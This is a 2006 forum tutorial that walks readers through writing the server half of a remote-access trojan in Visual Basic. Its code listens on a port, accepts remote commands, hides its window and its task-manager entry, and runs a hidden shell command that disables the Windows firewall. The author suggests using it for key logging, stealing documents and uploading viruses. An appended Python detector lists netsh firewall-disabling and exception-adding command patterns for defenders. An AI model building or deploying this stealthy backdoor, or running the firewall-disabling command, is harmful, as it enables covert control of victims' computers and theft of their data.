Posted: Fri Jun 30, 2006 1:10 pm Post subject: Basic VB Trojan Part 1 - Server Design & Source
A trojan (as explained in previous articles) is a remote communication utility. By this I mean there will be 2 or more applications communicating with each other over a network, whether that be LAN or Internet.
To do this in Visual Basic we use what's called the “winsock”. This is a socket control function for VB.
So start up VB and create a new standard exe.
We're going to first make the server and follow it up by making the client.
As we are making the server we don’t actually need a GUI and we want to make it slightly stealthy.
We're going to make it invisible to the task manager, and invisible to the naked eye, and also either disable the Windows default firewall or add itself to the exceptions list.
BUT before we do all that we need to add a socket control so go ahead and press ctrl+T then make sure the Windows Winsock Control is checked. Apply that and click ok. Now you’ve got an icon with 2 little computers connected in your toolbar. Click on that and place one on your form.
Name this socket control “WS_server”
Right, now for some code. We want it so that when the server boots up it starts listening for incoming connections.
Private Sub Form_Load() ' Form is loading DUH!!!
    WS_server.Close ' This will close all current connections if they already exist
    WS_server.LocalPort = "1234" ' Tells the server to listen to port 1234 (might want to change this)
    WS_server.Listen ' Finally we tell the server to just wait and monitor this port.
End Sub
There ya go, you’ve successfully managed to boot your server and get it to listen for incoming connections on port 1234.
Oh, I forgot to mention your server's listening, but it doesn’t know what to do when something happens. So we are going to need to make the server respond and accept a connection when it is requested.
Private Sub WS_server_ConnectionRequest(ByVal requestID As Long) ' Obvious
    WS_server.Close ' Closes any current connections
    WS_server.Accept requestID ' Accepts the connection.
End Sub
Congrats, you're now hooked up and listening to a remote client. Now here's where the fun stuff comes into it. The devious little tricks you can perform, installing key loggers, adding Windows profiles, download personal documents, upload viruses, even open and close the CD tray, the sky's the limit with what you want to achieve.
To do this we need to make a list of commands that the server knows how to carry out. So when the client sends the server a command, the server knows exactly what to do, and does it.
Private Sub WS_server_DataArrival(ByVal bytesTotal As Long)
    If Data = "hellomessage" Then ' If the incoming data is “hellomessage” then perform the following
        MsgBox "WASSAP!!!!!!!" ' Display a message saying WASSAP!!!!!!!
    End If
End Sub
Well done, our first remote command is in place. It’s a simple command but it's just to explain the theory behind this. I'll run into more complex code that can help the server obtain important information later on.
Now our server's operational. But it's extremely visible to the naked eye and the task manager. Adding this code will solve that:
Private Sub Form_Load() ' Form is loading DUH!!!
    Me.Visible = False ' Makes the form invisible
    App.TaskVisible = False ' Makes the file invisible in the task manager
    WS_server.Close
    WS_server.LocalPort = "1234"
    WS_server.Listen
End Sub
Now your server is complete. Try modifying the code and don’t be a script kiddie. This is a basic VB Trojan and can be modified easily. For argument's sake, one idea I have in my head right now is how to bypass the Windows firewall before the Trojan accesses the internet. In XP, if an app tries to access the net it gives you the option to block it.
I know that the DOS command is
“c:\Netsh firewall set opmode disable”
So I'd want to disable the firewall before the server tried accessing the internet.
Dim taskID As Double
taskID = Shell("C:\winnt\system32\cmd /C netsh firewall set opmode disable", 0)
The code for that would be written before the server established itself to port 1234.
Play about with it a bit.
My next article will be about how to make the client.
Hope you enjoyed it, please leave feedback as it is nice for people who write these tutorials to hear what the public think, whether you understand them or not etc etc.
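A defender-side check for the firewall change described above, as an added example that is not part of the original post: it scans process-creation command lines for netsh invocations that disable the firewall or add an exception, and notes when the parent process sits outside the system directories. The event fields, rule names, sample events, parent-directory list and the advfirewall and exception patterns are assumptions that go beyond the single command quoted in the post.

```python
import re

_NETSH = r'\bnetsh(?:\.exe)?"?\s+'
# Rule name -> pattern. The first is the legacy command quoted in the post;
# the other two are added generalizations (modern advfirewall syntax and the
# "add itself to the exceptions list" variant the post mentions).
RULES = {
    "firewall_disabled_legacy": re.compile(
        _NETSH + r"firewall\s+set\s+opmode\s+(?:mode\s*=\s*)?disable\b", re.I),
    "firewall_disabled_advfirewall": re.compile(
        _NETSH + r"advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
    "firewall_exception_added": re.compile(
        _NETSH + r"firewall\s+add\s+(?:allowedprogram|portopening)\b", re.I),
}

# Directories whose programs plausibly manage the firewall (assumption: tune per site).
EXPECTED_PARENT_DIRS = ("c:\\windows\\", "c:\\winnt\\", "c:\\program files")

def detect(events):
    """Return one finding per process-creation event that tampers with the firewall."""
    findings = []
    for ev in events:
        for rule, pattern in RULES.items():
            if pattern.search(ev["command_line"]):
                parent = ev["parent_image"].lower()
                findings.append({
                    "rule": rule,
                    "pid": ev["pid"],
                    "parent_image": ev["parent_image"],
                    # An EXE outside system/program directories shelling out
                    # to netsh is the pattern the post describes.
                    "unexpected_parent": not parent.startswith(EXPECTED_PARENT_DIRS),
                })
                break
    return findings

# Constructed sample events (field names are hypothetical, not a real log schema).
SAMPLE_EVENTS = [
    {"pid": 101, "parent_image": r"C:\Documents and Settings\bob\Desktop\server.exe",
     "command_line": r"C:\winnt\system32\cmd /C netsh firewall set opmode disable"},
    {"pid": 102, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\netsh.exe"  advfirewall set allprofiles state off'},
    {"pid": 103, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "netsh firewall show opmode"},
    {"pid": 104, "parent_image": r"C:\Temp\setup.exe",
     "command_line": r"NETSH firewall add allowedprogram C:\Temp\setup.exe Updater ENABLE"},
]
```

Read-only queries such as `netsh firewall show opmode` are deliberately not matched, so the rule fires only on state changes.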